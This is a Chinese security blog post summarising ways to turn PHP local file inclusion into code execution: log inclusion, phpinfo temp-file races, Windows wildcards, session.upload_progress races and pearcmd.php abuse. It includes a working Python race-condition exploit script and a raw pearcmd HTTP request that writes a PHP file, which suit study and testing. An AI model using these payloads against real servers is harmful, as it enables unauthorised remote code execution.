本地裸文件包含

最新推荐文章于 2023-04-25 20:46:10 发布
最新推荐文章于 2023-04-25 20:46:10 发布
阅读量455 收藏
点赞数
分类专栏: 漏洞整理 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nigo134/article/details/125365212
版权

1.本地日志包含

首先通过各种方法找到web日志,然后利用上面说的include的方式来包含之。

param=include$_GET[a];&a=/home/u244201241/.logs/php_error.log

如果找不到web日志,利用条件竞争的方法,包含tmp文件也可以.

2.phpinfo与条件竞争

利用条件:

1.存在phpinfo等可以泄露临时文件名的页面

2.网络条件好,才能让Race Condition成功

利用脚本:

exp.py

我们对任意一个PHP文件发送一个上传的数据包时,不管这个PHP服务后端是否有处理$_FILES的逻辑,PHP都会将用户上传的数据先保存到一个临时文件中,这个文件一般位于系统临时目录,文件名是php开头,后面跟6个随机字符;在整个PHP文件执行完毕后,这些上传的临时文件就会被清理掉。

以这个利用的条件就是,需要有一个地方能获取到文件名,例如phpinfo。phpinfo页面中会输出这次请求的所有信息,包括$_FILES变量的值,其中包含完整文件名:

3.Windows 通配符妙用

PHP在读取Windows文件时,会使用到FindFirstFileExW这个Win32 API来查找文件,而这个API是支持使用通配符的

  •     DOS_STAR:即 <,匹配0个以上的字符
  •     DOS_QM:即>,匹配1个字符
  •     DOS_DOT:即",匹配点号

这样,我们在Windows下,可以使用上述通配符来替代临时文件名中的随机字符串:C:\Windows\Temp\php<<。(由于Windows内部的一些不太明确的原因,这里一般需要用两个<来匹配多个字符

4.session.upload_progress与Session文件包含

PHP中可以通过session progress功能实现临时文件的写入。这个方法的原理是,PHP在开启了session.upload_progress.enable后,将会把用户上传文件的信息保存在Session中,而PHP的Session默认是保存在文件里的。

利用条件:

1.session.upload_progress.enable 为 ON,默认为ON

2.session.upload_progress.cleanup 为Off,默认为ON

利用脚本:

import threading
import requests
from concurrent.futures import ThreadPoolExecutor, wait

target = 'http://192.168.1.162:8080/index.php'
session = requests.session()
flag = 'helloworld'


def upload(e: threading.Event):
    files = [
        ('file', ('load.png', b'a' * 40960, 'image/png')),
    ]
    data = {'PHP_SESSION_UPLOAD_PROGRESS': rf'''<?php file_put_contents('/tmp/success', '<?=phpinfo()?>'); echo('{flag}'); ?>'''}

    while not e.is_set():
        requests.post(
            target,
            data=data,
            files=files,
            cookies={'PHPSESSID': flag},
        )


def write(e: threading.Event):
    while not e.is_set():
        response = requests.get(
            f'{target}?file=/tmp/sess_{flag}',
        )

        if flag.encode() in response.content:
            e.set()


if __name__ == '__main__':
    futures = []
    event = threading.Event()
    pool = ThreadPoolExecutor(15)
    for i in range(10):
        futures.append(pool.submit(upload, event))

    for i in range(5):
        futures.append(pool.submit(write, event))

    wait(futures)

5.pearcmd.php的巧妙利用

利用条件:

1.PHP以Server的形式运行

2.开启了register_argc_argv,默认关闭

利用方法:

GET /index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=phpinfo()?>+/tmp/hello.php HTTP/1.1
Host: 192.168.1.162:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close

nigo134
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
dotfiles:git repo个人配置文件
03-30
"dotfiles"是这类文件的一个术语,它指的是用户主目录下以"."开头的隐藏文件,这些文件通常包含了用户的个性化设置、环境变量以及各种工具的配置。本文将深入探讨`dotfiles`的概念、用途,以及如何使用Git进行管理,...
PHP文件包含漏洞(利用phpinfo)复现&&文件上传(条件竞争)
最新发布
sinat_61654365的博客
01-11 1894
在 PHP 环境下,如果网站存在本地文件包含漏洞,但是却无法找到想要包含文件,也无法生成和上传文件,是否能够获得 WebShell 呢?这里有一个技巧,前提是网站需要有一个 phpinf 页面,就可以通过条件竞争来包含缓存文件获取 WebShell了。这个技巧实际上融合了PHIP 文件包含信息泄露条件竞争这三种漏洞,下面简述一下这种技巧的原理。
php条件竞争,文件上传 之 条件竞争
weixin_29464593的博客
03-17 768
测试demo:enctype="multipart/form-data">Filename:if (!empty($_FILES)) {move_uploaded_file($_FILES['file']['tmp_name'],$_FILES['file']['name']);unlink($_FILES['file']['name']);}?>shell文件内容:echo md5(...
一、WillPHPv2代码审计-[变量覆盖]-[文件包含]-[任意文件读取漏洞]-[pearcmd文件包含]
qwsn
12-12 3382
时间戳——2021.12.12 0x01 WP: 第一步:拉去本地代码审计(框架调试) 第二步:调试过程 第三步:在buuctf开启的的环境里获取flag 附:怎么配置phpstorm+phpstudy+xdebug远程调试 注意:配置一个假的远程调试,我们就把源码放到本机(也就是127.0.0.1)的网站根目录WWW下的exp/willphpv2目录下 第一步:访问https://xdebug.org/wizard,把phpinfo的内容贴进去,会返回我们可以使用的对应版本的xdebug 第二
系统安全实验——PHP本地文件包含漏洞
IT_GIRL_XYX的博客
04-25 316
PHP文件包含漏洞分为本地文件包含漏洞(LFI)和远程文件包含漏洞(RFI),能够打开并包含本地文件的漏洞,被称为本地文件包含漏洞。利用本地文件包含漏洞可以查看系统任意文件内容,如果具备一些条件,也可以执行命令。当前网站根目录下的test.php文件存在本地文件包含漏洞。提示:flag存在于/etc/passwd文件中,你需要通过使用PHP本地文件包含漏洞来找到flag。
浅析条件竞争漏洞
Atkx's Blog
05-23 2967
目录0x00-前言0x01-基础知识0x02-漏洞分析0x03-CTF中的条件竞争 0x00-前言 条件竞争漏洞是一种服务器端的漏洞,由于服务器端在处理不同用户的请求时是并发进行的。开发者在进行代码开发时常常倾向于认为代码会以线性的方式执行,而且他们忽视了并行服务器会并发执行多个线程,这就会导致意想不到的结果,简而言之就是并没有考虑线程同步。因此,如果并发处理不当或相关操作逻辑顺序设计的不合理时,将会导致此类问题的发生。 0x01-基础知识 先来了解一下关于条件竞争的基础知识 条件竞争: 系统中,最小的运算
QT+FFMPEG 从摄像机拉取rtsph264流,播放并保存到本地
02-22
从摄像头拉rtsph264流 实时播放 视频流实时转换为Mpeg-Ts保存在本地 改变码率,改变I帧间隔 断线重连 ffmpeg版本4.3,包括在源码中 作为学习够用了 公用测试rtsp: rtsp://wowzaec2demo.streamlock.net/vod/mp4:...
文件系统简介
08-12
通过挂载远程服务器上的NFS文件系统,用户可以在本地系统上透明地访问远程文件,这对于分布式系统和多机器协作非常有用。配置NFS挂载涉及设置服务器端的共享目录和客户端的挂载点,通过`mount`命令加上特定的NFS选项...
LWIP机实现TCPUDP通讯
04-01
- **UDP套接字**:创建UDP套接字使用`udp_new()`,绑定本地端口使用`udp_bind()`,连接到远程地址使用`udp_connect()`(可选)。 - **数据收发**:使用`udp_sendto()`发送数据,`udp_recv()`注册接收回调处理接收...
dotf:为我的私人点文件添加仓库
02-23
标题中的“dotf:为我的私人点文件添加仓库”表明这是一个关于个人文件管理的项目,特别是针对“点文件”(通常是指Unix/Linux系统中以"."开头的隐藏配置文件)的存储和管理。这个项目可能使用了Git仓库来组织和...
文件上传漏洞之——利用条件竞争绕过
wsnbbz的博客
03-04 4677
条件竞争漏洞 . 介绍 条件竞争漏洞是一种服务器端的漏洞,由于服务器端在处理不同的请求时是并发进行的,因此如果并发处理不当或相关操作顺序设计的不合理时,将会导致此类问题的发生 原理 上传文件源代码里没有校验上传的文件文件直接上传,上传成功后才进行判断:如果文件格式符合要求,则重命名,如果文件格式不符合要求,将文件删除 由于服务器并发处理(同时)多个请求,假如a用户上传了木马文件,由于代码执行需要...
条件竞争漏洞
cxrpty的博客
02-19 648
条件竞争漏洞是一种服务器端的漏洞,由于服务器端在处理不同用户的请求时是并发进行的。因此,如果并发处理不当或相关操作逻辑顺序设计的不合理时,将会导致此类问题的发生。 以upload—labsPass17为例: 1.查看其源码 ...
WEB-CTF 条件竞争
iamsongyu的博客
10-24 6171
如何来形容这个类型的问题呢,就像是幼儿园发糖吃,每个人只能拿一块,但是如果你跟别人一起再拿一次老师也没办法分辨,毕竟一群小朋友老师也没办法分辨手和对应的人。 关于部分的Burpsuite使用的知识,在前面的https://blog.csdn.net/iamsongyu/article/details/82989478中已经讲了,就不在赘述   这是一个好文章,从上边摘抄和借鉴了不少 htt...
php条件竞争漏洞,CTF中的条件竞争漏洞
weixin_36304806的博客
03-20 475
条件竞争是沃特?敲黑板,定义:竞争条件发生在多个线程同时访问同一个共享代码、变量、文件等没有进行锁操作或者同步操作的场景中。开发者在进行代码开发时常常倾向于认为代码会以线性的方式执行,而且他们忽视了并行服务器会并发执行多个线程,这就会导致意想不到的结果。线程同步机制确保两个及以上的并发进程或线程不同时执行某些特定的程序段,也被称之为临界区(critical section),如果没有应用好同步技术...
mysql 文件备份(Xtrabackup)
lv941002的博客
09-12 182
    安装Xtrabackup(尽量安装高版本的) 下载地址:https://www.percona.com/downloads/XtraBackup/LATEST/ version:选择最新的版本,可以兼容低版本的数据库 tar -zxvf percona-xtrabackup-2.4.9-Linux-x86_64.tar.gz cd percona-xtrabackup-2....
php 利用pearcmd实现文件包含
weixin_45805993的博客
12-03 1900
主要内容参考P神博客https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html 0x00phpinfo与条件竞争 之前做题好像遇到过,再复习一下 我们对任意一个PHP文件发送一个上传的数据包时,不管这个PHP服务后端是否有处理$_FILES的逻辑,PHP都会将用户上传的数据先保存到一个临时文件中,这个文件一般位于系统临时目录,文件名是php开头,后面跟6个随机字符;在整个PHP文件执行完毕后,这些上传的临时文件就会被清理掉
文件包含漏洞三道题
qz362228的博客
05-04 1591
1.绕过require_once限制 题目页面: 有两个require_once,则this_is_flag.php已经被包含一次就不会再包含了。而题目意思就是说flag在this_is_flag.php文件中。所以要想绕过前面那个require_once,而执行后面那个。在浏览器中搜索绕过require_once限制 因为知道文件路径,所以最后是/www/html/file_include/Assess01/this_is_flag.php ?url=/proc/self/root/proc/self/r
PHP-从LFI到RCE(上)
qq_50643984的博客
08-31 1684
利用的lfi本地文件包含,就是包含一个含有php代码的文件,不限制后缀名,也可以临时文件进行条件竞争,当然php是神奇的语言,有伪协议还有fastcgi,还有auto_prepend_file的参数,内存错误异常退出,甚至可以去看php底层代码,这些特性还有很多,值得我们探索。接下来我们可以从几道ctf题来看一下lfi到rce。...
Git配置文件误删回滚解决方案:实用工具
仓库的特点是不包含工作区,只用于存储元数据和提交历史。 第二步,我们需要在工作区设置一个与仓库关联的工作目录。创建`work`目录,初始化一个新的Git工作区,以便进行文件操作和提交。这里设置了全局的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值